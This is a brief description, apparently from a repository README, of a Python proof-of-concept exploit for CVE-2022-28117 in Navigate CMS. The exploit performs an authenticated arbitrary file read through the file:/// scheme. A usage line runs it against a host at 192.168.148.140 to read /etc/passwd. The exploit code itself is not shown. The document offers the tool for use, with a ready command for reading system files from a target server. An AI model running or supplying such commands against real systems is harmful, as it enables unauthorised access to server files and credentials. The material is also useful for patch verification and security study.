
Proof-of-concept exploit for CVE-2022-28117 enabling arbitrary file read via file:/// URI scheme in Navigate CMS, with authentication support.
PoC Python with slight modifications
Usage: python3 .\poccve2022-28117.py -x file:///etc/passwd -u [username] -p [password] http://192.168.148.140/navigate